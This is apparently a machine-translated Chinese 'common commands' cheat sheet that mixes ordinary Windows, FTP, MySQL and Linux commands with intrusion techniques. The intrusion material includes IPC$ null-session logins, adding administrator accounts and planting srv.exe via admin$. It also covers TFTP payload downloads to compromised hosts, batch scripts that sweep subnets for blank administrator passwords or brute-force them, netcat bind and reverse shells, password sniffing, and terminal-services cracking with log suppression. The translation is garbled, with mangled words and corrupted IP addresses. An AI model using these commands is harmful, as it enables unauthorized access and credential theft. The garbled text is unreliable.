给出一些常用的运行命令?
Net使用ipipc$ ""/user:" "建立ipc空链接。
Net使用ipipc$ "password" /user:"用户名"建立ipc非空链接。
Net使用h: ipc$“密码”/用户:“用户名”直接登录,映射到对方。列车员:是h:
Net使用h: ipc$登录C:后映射对方到本地,是H:
Net使用ipipc$ /del删除ipc链接。
Net使用h: /del删除对方到本地的映射,名称为h:
Net用户用户名密码/添加创建用户。
网络用户来宾/活动:是激活来宾用户。
Net用户来查看那里有哪些用户。
Net用户帐户名查看帐户的属性。
Net localgroup administrators用户名/add将“用户”添加到管理员,使其具有管理员权限。注意:在管理员后面加上复数s。
Net开始查看打开了哪些服务。
net start服务名启动服务;(例如,网络启动远程登录、网络启动时间表)
网络停止服务名称停止服务。
净时间目标ip检查对方的时间
Net time target ip /set设置本地计算机与“目标ip”主机之间的时间同步,并添加参数/yes以取消确认信息。
查看本地局域网中启用了哪些* * *特权。
Net查看ip,看对方局域网内开启了哪些* * *权限。
网络配置显示系统网络设置。
网络下线断开* * *享受
Net暂停服务名称暂停服务。
Net send ip“短信”向对方发送消息。
网络连接类型和信息用于网络。
网分享查看当地* * *享受。
净份额ipc$开放ipc$***享受。
净份额ipc$ /del删除ipc$***
净份额c$ /del删除c:* * * *享受。
Net用户guest 12345登录后,将密码改为12345。
Net password密码更改系统登录密码。
Netstat -a来查看哪些端口是打开的。经常使用netstat -an。
Netstat -n检查端口的网络连接,通常是netstat -an。
查看正在进行的工作
netstat -p协议名称示例:netstat -p tcq/ip查看协议的用法(查看tcp/ip协议的用法)。
Netstat -s查看所有正在使用的协议的使用情况。
Nbtstat -A ip从136到139的其中一个ip端口是开放的,可以查看对方最近登录的用户名(03之前的用户名)-注意:参数-A要大写。
tracert-参数ip(或计算机名)跟踪路由(包),参数:“-w号”用于设置超时间隔。
Ping ip(或域名)向另一台主机发送默认大小为32字节的数据。参数是“-l[ space]数据包大小”;“-n次发送数据”;“-t”表示一直ping。
Ping -t -l 65550 ip Ping of death(发送大于64K的文件并且一直ping就变成了ping of death)。
Ipconfig (winipcfg)用于windows NT和XP(windows 95 98)查看本地ip地址,Ipconfig可以用参数“/all”显示所有配置信息。
Tlist -t以树行列表的方式显示进程(它是系统的附加工具,默认情况下不安装,位于安装目录的Support/tools文件夹下)。
在kill -F进程名中添加-F参数,强制结束一个进程(它是系统的附加工具,默认不安装,在安装目录的Support/tools文件夹下)。
添加-F参数后可以删除Del -F文件名。/AR、/AH、/AS和/AA分别表示删除只读、隐藏、系统和存档文件。/A-R、/A-H、/A-S和/A-A表示删除除只读、隐藏、系统和存档文件以外的文件。例如,“DEL/AR *。* "表示删除当前目录下的所有只读文件," DEL/A-S *。* "表示删除当前目录下除系统文件以外的所有文件。
二:
删除/S /Q目录或使用:rmdir /s /Q directory /S删除该目录及其下的所有子目录和文件。同时使用参数/Q取消删除操作,在系统确认后直接删除。(两个命令具有相同的效果)
移动驱动器路径要移动的文件名存储移动文件的路径。移动文件名后,使用参数/y取消提示,确认移动目录中存在相同文件,直接覆盖。
fc one . txt two . txt & gt;3t.txt比较两个文件,并将差异输出到3t.txt文件。“>”和“> >这是一个重定向命令
at id号打开注册的计划任务。
At /delete停止所有计划任务,使用参数/yes,可以直接停止,无需确认。
在id号/删除时停止已注册的计划任务。
查看所有计划任务。
在ip时间程序名(或命令)/r在某个时间运行对方的程序并重新启动计算机。
手指username @host查看最近有哪些用户登录过。
Telnet ip端口远离登录服务器,默认端口为23。
Open ip连接到IP(telnet登录后的命令)
Telnet:在这台机器上直接键入telnet将在这台机器上输入telnet。
复制路径文件名1路径文件名2 /y将文件1复制到指定目录作为文件2,并使用参数/y取消确认,同时您要覆盖现有的目录文件。
复制c:srv.exe ipadmin$将本地的c:srv.exe复制到对方的admin。
cppy 1st.jpg/b+2st.txt/a 3st.jpg将2st . txt的内容隐藏到1st . jpg中,在3st.jpg生成一个新文件。注意:2st.txt文件头要空三行。参数:/b指二进制文件,/a指ASCLL文件。
复制ipadmin$svv.exe c:或:copyipadmin$*。*将其他admini $ * * *享有的srv.exe文件(所有文件)复制到本地c:
Xcopy文件或目录树目标地址目录名复制文件和目录树,并覆盖相同的文件,而不使用参数/y进行提示。
Tftp -i自有IP(以肉机为跳板时使用肉机IP)获取server.exe c:server . exe登录后,将“IP”的server.exe下载到目标主机C:server。exe参数:-i表示以二进制模式传输,例如传输EXE文件时,或者如果没有添加-i,则以ASCII模式(传输文本文件模式)传输。
tftp -i IP put c:server.exe登录后,上传本地c:server.exe到主机。
ftp ip端口用于向服务器上传文件或执行文件操作。默认端口是21。Bin指二进制传输(可执行文件入口);默认情况下,它以ASCII格式传输(如果是文本文件)。
路由打印显示IP路由,主要显示网络地址网络地址、子网掩码网络掩码、网关地址网关地址和接口地址接口。
Arp检查并处理ARP缓存。ARP表示名称解析,负责将IP地址解析为物理MAC地址。Arp -a将显示所有信息。
启动程序名或命令/max或/min打开一个新窗口并最大化(最小化)运行一个程序或命令。
用于检查cpu使用情况的内存
Attrib文件名(目录名)查看文件(目录)的属性。
Attrib文件名-A -R -S -H或+A +R +S +H删除(添加)文件的存档、只读、系统和隐藏属性;with+作为属性添加。
查看文件的目录。参数:/Q显示文件和目录属于哪个用户,/T:C显示文件创建的时间,/T:A显示上次访问文件的时间,/T:W显示上次修改文件的时间。
日期/t,时间/t使用该参数,即“日期/T”和“时间/T”,将只显示当前日期和时间,而不输入新的日期和时间。
Set指定环境变量名称=要分配给变量的字符设置环境变量。
Set显示所有当前环境变量。
Set p(或其他字符)显示当前以字符p(或其他字符)开头的所有环境变量。
暂停暂停批处理程序并显示:请按任意键继续。....
If在批处理程序中执行条件处理(有关更多详细信息,请参见if命令和变量)
goto标记将cmd.exe指向批处理程序中的标记行(该标记必须是单独的一行,并以冒号开头,例如“:start”标记)。
调用路径批处理文件名从一个批处理程序调用另一个批处理程序(参见call/?)
For对一组文件中的每个文件执行特定的命令(有关更多详细信息,请参见for commands and variables)。
回声打开或关闭打开或关闭回声,显示当前回声设置,只有回声,没有参数。
回声信息在屏幕上显示信息。
回声信息> & gtPass.txt将“信息”保存到pass.txt文件中。
Findstr "Hello" aa.txt在aa.txt文件中查找字符串Hello。
查找文件名查找文件
标题标题名称更改CMD窗口的标题名称。
color值设置cmd控制台的前景色和背景色;0 =黑色,1 =蓝色,2 =绿色,3 =浅绿色,4 =红色,5 =紫色,6 =黄色,7=白色,8=灰色,9=浅蓝色,a =浅绿色,B=浅绿色,C=浅红色,D=浅紫色。
提示名称改变显示的cmd.exe命令提示(将C:和D:改为EntSky)。
三:
Ver在DOS窗口显示版本信息。
Winver弹出窗口显示版本信息(内存大小、系统版本、补丁版本、电脑名称)。
Format letter /FS: type格式化磁盘,类型:FAT,FAT32,NTFS,例如:Format D: /FS:NTFS。
Md目录名创建目录
替换源文件被替换文件的目录替换文件
任原文件名新文件名重命名文件名
Tree以树形结构显示目录,第一个文件夹中的文件名将使用参数-f列出。
类型文件名显示文本文件的内容。
更多文件名逐屏显示输出文件。
Doskey命令锁定=字符
Doskey command to unlock =为DOS提供的lock命令(编辑命令行,调用win2k命令,创建宏)。比如:lock dir命令:doskey dir=entsky (doskeydir = dir不能用);解锁:doskey dir=
Taskmgr调用任务管理器
Chkdsk /F D:检查磁盘D并显示状态报告;添加参数/f并修复磁盘上的错误。
Tlntadmn telnt service admn,键入Tlntadmn,选择3,然后选择8,将telnet服务的默认端口23更改为任何其他端口。
退出退出cmd.exe程序或目前使用参数/B退出当前批处理脚本而不是cmd.exe。
Path Path可执行文件的文件名设置可执行文件的路径。
Cmd启动win2K命令解释窗口。参数:/eff,/en关闭和打开命令扩展。见cmd/?
regedit /s注册表文件名被导入注册表中;参数/S是指没有任何提示的安静模式导入;
Regedit /e注册表文件名导出注册表
Cacls文件名参数显示或修改文件访问控制列表(ACL)-对于NTFS格式。参数:/D用户名:设置为拒绝用户访问;/P用户名:perm替换指定用户的访问权限;/G用户名:perm给指定的用户访问权限;Perm可以是:N无,R读,W写,C改(写),F全控;示例:cacls D:est . txt/D pub set D:est . txt拒绝pub用户的访问。
Cacls文件名查看文件的访问用户权限列表。
REM文本内容向批处理文件添加注释
查看或更改本地网络配置
四:
IIS服务命令:
Iisreset /reboot重启win2k电脑(但是有系统重启的提示)。
Iisreset /start或stop启动(停止)所有Internet服务。
Iisreset /restart停止并重新启动所有Internet服务。
Iisreset /status显示所有Internet服务的状态。
Iisreset /enable或disable启用(禁用)在本地系统上重新启动Internet服务。
Iisreset /rebootonerror当启动、停止或重新启动Internet服务时,如果出现错误,它将重新启动。
如果无法停止Internet服务,Iisreset /noforce将不会强制终止Internet服务。
当超时(秒)过期时,Iisreset /timeout Val没有停止Internet服务。如果指定了/rebooterror参数,计算机将重新启动。默认值为重启20秒、停止60秒和重启0秒。
FTP命令:(细节稍后给出)
ftp的命令行格式是:
FTP-V-D-I-N-G[主机名]-V显示远程服务器的所有响应信息。
-d使用调试模式。
-n限制ftp自动登录,即不使用。netrc文件。
-g取消全局文件名。
帮助[命令]还是?[命令]查看命令描述
Bye或quit终止主机FTP进程并退出FTP管理模式。
Pwd列出了当前的远程主机目录。
上传或发送本地文件名[上传到主机的文件名]将本地文件发送到远程主机。
Get或recv[远程主机的文件名][下载到本地后的文件名]从远程主机传输到本地主机。
Mget [remote-files]从远程主机向本地主机接收一批文件。
Mput local-files将一批文件从本地主机传输到远程主机。
Dir或ls[远程目录][本地文件]列出当前远程主机目录中的文件。如果有本地文件,则将结果写入本地文件。
Ascii将文件设置为以ASCII格式发送(默认值)。
Bin或image设置文件以二进制模式发送。
每次完成文件传输时,Bell都会发出警报。
Cdup返回到上一个目录。
关闭中断与远程服务器的ftp会话(对应于打开)
Open host[port]建立指定ftp服务器的连接,并可以指定连接端口。
删除从远程主机删除文件。
删除一批文件。
Mkdir directory-name在远程主机上创建一个目录。
重命名[从][到]更改远程主机中的文件名。
Rmdir directory-name删除远程主机中的目录。
状态显示当前的FTP状态。
系统显示远程主机系统类型。
用户用户名[密码][帐户]使用不同的用户名再次登录远程主机。
Open host [port]重新建立新的连接。
提示交互提示模式
Macdef定义宏命令
lcd改变当前本地主机的工作目录,如果默认,将转到当前用户的主目录。
Chmod更改远程主机的文件权限。
当大小写打开时,由MGET命令复制的文件名被传送到本地机器,并且所有文件被转换成小写字母。
Cd remote-dir进入远程主机目录。
Cdup进入远程主机目录的父目录。
!在本地机器执行交互shell,exit返回ftp环境,比如!ls*。活力
#5五:
MYSQL命令:
Mysql -h主机地址-u用户名-p密码连接MySQL;如果刚刚安装MYSQL,超级用户root没有密码。
(例如:MySQL-h 110.10.10.110-urot-p 123456)
注意:u和root可以留空,其他也可以)
退出退出MYSQL
Mysqladmin -u username -p旧密码新密码更改密码
授予对数据库的select权限。*以用户名@登录由"密码"标识的主机;添加新用户。(注意:和上面不一样,下面都是MYSQL环境下的命令,所以后面用分号作为命令终止符。)
显示数据库;显示数据库列表。一开始只有两个数据库:mysql和test。Mysql库很重要。它包含MYSQL系统信息。我们在修改密码和添加新用户的时候,其实都是用这个库来操作的。
使用mysql
显示表格;显示库中的数据表
描述表名;显示数据表的结构
创建数据库库名称;建一座图书馆
使用库名;
创建表格表名(字段设置列表);制造一只手表
删除数据库库名称;
删除表表名;删除数据库和删除表
从表名中删除;清除表中的记录
Select * from表名;在表格中显示记录
mysqldump-opt school & gt;School.bbb备份数据库:(命令在DOS的目录下mysql中执行);注意:将数据库school备份到文件school.bbb,这是一个具有任意文件名的文本文件。打开看看会不会有新发现。
win2003系统下的新命令(实用部分):
shut down/参数关闭或重新启动本地或远程主机。
参数描述:/S关闭主机,/R重新启动主机,/T在0 ~ 180秒范围内设置延迟时间,/A取消启动,/m//IP指定的远程主机。
示例:shutdown /r /t 0立即重新启动本地主机(没有延迟)
task ill/参数进程名称或进程的pid终止一个或多个任务和进程。
参数说明:/pid要终止一个进程的pid,可以使用tasklist命令获取每个进程的pid,/IM要终止的进程的进程名,/F强制终止进程,/T终止指定的进程及其启动的子进程。
Tasklist显示当前在本地和远程主机上运行的进程、服务和服务进程的进程标识符(PID)。
参数说明:/M列出当前进程加载的dll文件,/SVC显示每个进程对应的服务,如果没有参数,则只列出当前进程。
六:
Linux系统下的基本命令:区分大小写。
Uname显示版本信息(与win2K的ver相同)
Dir显示当前目录文件,ls -al显示隐藏文件(与win2K的dir相同)。
Pwd查询当前目录位置。
Cd cd..回到上一个目录,注意cd和之间有一个空格...CD/返回到根目录。
卡特彼勒文件名查看文件内容
cat & gtAbc.txt将内容写入文件abc.txt
更多文件名逐页显示文本文件。
Cp复制文件
Mv移动文件
Rm文件名删除文件,RM-目录名删除目录和子目录。
Mkdir目录名创建目录
Rmdir删除子目录,目录中没有文档。
Chmod设置文件或目录的访问权限。
Grep在文件中查找字符串。
差异文件比较
查找文件搜索
日期当前日期和时间。
谁在查询目前和你用同一台机器的人以及登录的时间和地点。
w查询当前计算机用户的详细信息。
Whoami检查您的帐户名称。
群组查看某人的群组。
Passwd更改密码
历史,检查你自己的命令。
Ps显示进程状态。
Kill停止一个进程。
Gcc黑客通常用它来编译C语言编写的文件。
Su权限被转换为指定的用户。
Telnet IP telnet连接到另一台主机(同win2K),当bash$出现时,连接成功。
Ftp ftp连接到服务器(与win2K相同)。
附件:批处理命令和变量
1:for命令和变量的基本格式:
FOR/parameter % variable in(set)docommand[command _ parameters]% variable:指定单字母可替换参数,如:%i,用:%%i指定变量,用:%i%调用变量,变量区分大小写(%i不等于%i)。
批处理可在%0-%9 * * * 10的时间范围内处理的变量,其中%0默认用于批处理文件名,而%1是使用此批处理时输入的第一个值。类似地,% 2-%9是指输入的第二个到第九个值;示例:net use ipipc $ pass/user:用户中的ip是%1,pass是% 2,用户是%3。
(set):指定一个文件或一组文件,使用通配符,如(D:user.txt)和(1 1 254)(1-1 254),{"(1 1 254)。"(1 -1 254)"描述:从254到1}
Command:指定要在第一个文件上执行的命令,如:net use command如果要执行多个命令,命令这个房间添加:&;分开
Command_parameters:为特定命令指定参数或命令行开关。
IN (set):指(set)中的值;DO命令:指执行命令。
参数:/L是指增量形式{(set)是增量形式};/F是指从文件中连续取值,直到取完为止{(set)是文件,比如(d:pass.txt)}。
用法示例:
@关闭回声
Echo使用格式:test.bat *。*.* >测试. txt
for/L % % G in(1 1 254)do echo % 1。% % G & gt& gttest.txt & amp净使用\% 1。%% g/user: administrator | find "命令成功完成" > & gt测试. txt
另存为test.bat描述:依次尝试为指定C类网段的254个IP建立管理员密码为空的IPC$连接。如果成功,将IP保存在test.txt中。
/L是指增量形式(即从1-254或254-1);输入IP的前三位数字:*。*.*是批处理的默认% 1;%%G是变量(ip的最后一位);& amp用于分隔echo和net use命令;|指建立ipc$,在结果中用find查看是否有"命令成功完成"的信息;%1.%%G是一个完整的IP地址;(1 1 254)是指起始值、增长额和终止值。
@关闭回声
Echo使用格式:ok.bat ip
对于/F % % I IN(D:user . DIC)DO smb.exe % 1% % I D:pass . DIC 200
另存为:ok.exe描述:输入一个IP后,使用字典文件d:pass.dic解密d:user.dic中的用户密码,直到取完文件中的所有值。%%i是用户名;%1是输入的IP地址(默认)。
七:
2.2:if命令和变量的基本格式:
IF [not] errorlevel数字命令语句如果程序最终返回一个等于或大于指定数字的退出代码,则指定条件为“真”。
示例:IF errorlevel 0命令是指返回值为0时程序执行后的命令;IF not errorlevel 1命令意味着如果程序执行返回的最后一个值不等于1,将执行下面的命令。
0表示找到并成功执行(真);1表示未找到或未执行(假)。
IF [not] string 1== string 2命令语句如果指定的文本字符串匹配(即string 1等于string 2),将执行下面的命令。
示例:“if"% 2% "=" 4 "goto start "的意思是:如果输入的第二个变量是4,将执行以下命令(注意:调用变量时,% variable name%会加上" ")。
IF [not] exist文件名命令语句如果指定的文件名存在,下面的命令将被执行。
例如:“如果不是nc.exe·格托恩德”的意思是:如果你没有找到nc.exe的文件,跳到“:结束”标签。
IF [not] errorlevel数字命令语句else命令语句或if [not] string 1== string 2命令语句else命令语句或IF [not] exist文件名命令语句else命令语句plus:在else命令语句后,是指前一个条件不为真时else行后的命令。注意:else必须在同一行上才有效。当有del命令时,应该使用del命令的全部内容
(2)系统外部命令(需要下载相关工具):
1,瑞士军刀:nc.exe
参数描述:
-h查看帮助信息
-三维背景模式
-e prog程序重定向,一旦连接,执行[危险]
isecs延迟间隔
-l监听模式,用于入站连接
-L监控模式,连接关闭后继续监控,直到CTR+C。
-n IP地址,不是域名。
-o片记录16的传输。
-p[ space] port本地端口号
-r随机本地和远程端口
-t使用Telnet交互模式。
-u UDP模式
-v详细输出,用-vv会更详细。
-w数字超时延迟间隔
-z关闭输入和输出(当用于扫锚时)
基本用法:
NC-NVV 192.168.0.180连接到192.168.0 . 1主机的80端口。
Nc -l -p 80打开本机的TCP 80端口监听。
NC-NVV-W2-z 192.168.0 . 180-1024 80-192.168.0 . 1用于扫锚。
NC-l-p 5354-t-e c:winntsystem32cmd.exe将远程主机的cmdshell绑定到远程主机的TCP 5354端口。
NC-t-e c:winntsystem32cmd.exe 192.168.0 . 2 5354设置远程主机的cmdshell,反向连接192.438+068.0.2的端口5354。
高级用法:
Nc -L -p 80作为蜜罐用1:打开并不断监听80口,直到CTR+C。
NC-L-p 80 & gt;C:log.txt作为蜜罐,用2:开启,不断监听80口,直到CTR+C,输出结果到c: log.txt。
NC-L-p 80 & lt;C:honeyport.txt作为蜜罐用3-1:打开并不断监听80端口直到CTR+C,将c:honeyport.txt中的内容发送到管道中,也可以起到传输文件的作用。
Type.exe C:honey port | NC-L-P 80作为蜜罐3-2:打开并不断监听端口80,直到CTR+C,将c:honeyport.txt中的内容发送到管道中也可以起到传输文件的作用。
对于本机器:nc -l -p本地端口。
在另一台主机上:NC-e cmd.exe本地IP -p本地端口*win2K。
Nc -e /bin/sh本地IP -p本地端口*linux,unix反向连接突破对方主机的防火墙。
本机使用:nc -d -l -p本地端口
在对方主机上:NC-vv local IP local port >;存储文件的路径和名称。将文件发送到另一台主机。
注意:
管道命令
& lt或>重定向命令。" & lt",例如:tlntadmn < Test.txt是指将Test.txt的内容赋给tlntadmn命令。
@表示执行@后面的命令,但不会显示(后台执行);示例:@ @ dir c:win nt > & gt;D:log.txt的意思是:dir在后台执行,结果存储在D: log.txt中。
& gtWith > & gt“>”的区别是指:覆盖;" & gt>指保存到(添加到)。
如:@ dir c:win nt > & gt;D:log.txt和@dir c:winnt >两个命令d:log.txt比较两次:use >;& gt目的是保存所有的次要结果,使用: >只有一个结果,因为第二个结果覆盖了第一个结果。
八:
2.扫锚工具:xscan.exe。
基本格式
xscan-host & lt;开始IP & gt[-& lt;终止IP & gt]& lt;测试项目>【其他选项】扫描主播“起始IP到结束IP”段的所有主机信息。
xscan-file & lt;主机列表文件名> & lt测试项目>[其他选项]扫描锚中的所有主机信息"主机IP列表文件名"
试验项目
-active检测主机是否处于活动状态。
-操作系统检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port检测常用服务的端口状态。
-ftp检测ftp弱密码
-pub检测FTP服务的匿名用户的写权限。
-pop3检测pop 3-服务器弱密码
-smtp检测smtp服务器漏洞
-sql检测SQL-Server弱密码
-smb检测到NT-Server弱密码。
-iis检测到iis编码/解码漏洞。
-cgi检测cgi漏洞
-nasl加载Nessus攻击脚本
-all检测上述所有项目。
其他选项
-i适配器号设置网络适配器,可以通过"-l "参数获得。
-l显示所有网络适配器。
-v显示详细的扫描进度。
-p跳过没有响应的主机。
-o跳过未检测到开放端口的主机。
-t并发线程数,并发主机数指定最大并发线程数和并发主机数,默认为100和10。
-log file name指定扫描报告的文件名(后缀为:TXT或HTML格式的文件)。
用法示例
xscan-主机192.168.1-192.654438+068.255 . 255-全主动式害虫检测+092 . 54656656
xscan-host 192.168.1-192.168.255 . 255-Port-sm B- t 150-O检测192。168.255.255网段内主机的标准端口状态,nt弱密码用户,最大并发线程数为150,跳过无开放端口的主机。
xscan-file hostlist.txt-port-CGI-t200,5-v-o检测“hostlist . txt”文件中列出的所有主机的标准端口状态,以及CGI漏洞。最大并发线程数为200,最多同时检测5台主机,显示详细的检测进度,跳过未检测到开放端口的主机。
九:
3.命令行嗅探:xsniff.exe。
可以捕获局域网中FTP/SMTP/POP3/HTTP协议的密码。
参数描述
-tcp输出tcp数据报
-udp输出udp数据报
-ICMP输出ICMP数据报
-传递过滤器密码信息。
-隐藏后台运行
-host解析主机名。
-addr IP地址过滤器IP地址
-端口端口过滤器端口
-log filename将输出保存到文件中。
ascII格式的ASC输出。
-十六进制输出为16的十六进制形式。
用法示例
xsniff . exe-pass-hide-log pass.log在后台运行嗅探密码,并将密码信息保存在pass . log文件中。
xsniff . exe-tcp-udp-ASC-ADR 192.168.1嗅探192.168.1过滤TCP和UDP信息并以ASCII格式输出。
4.终端服务密码破解:tscrack.exe。
参数描述
-h显示帮助。
-v显示版本信息。
-s在屏幕上播放解密的能力
-b密码错误时的声音。
-t both发送多个连接(多线程)
-N阻止目标服务器上的系统日志条目
-U卸载删除tscrack组件。
-f大使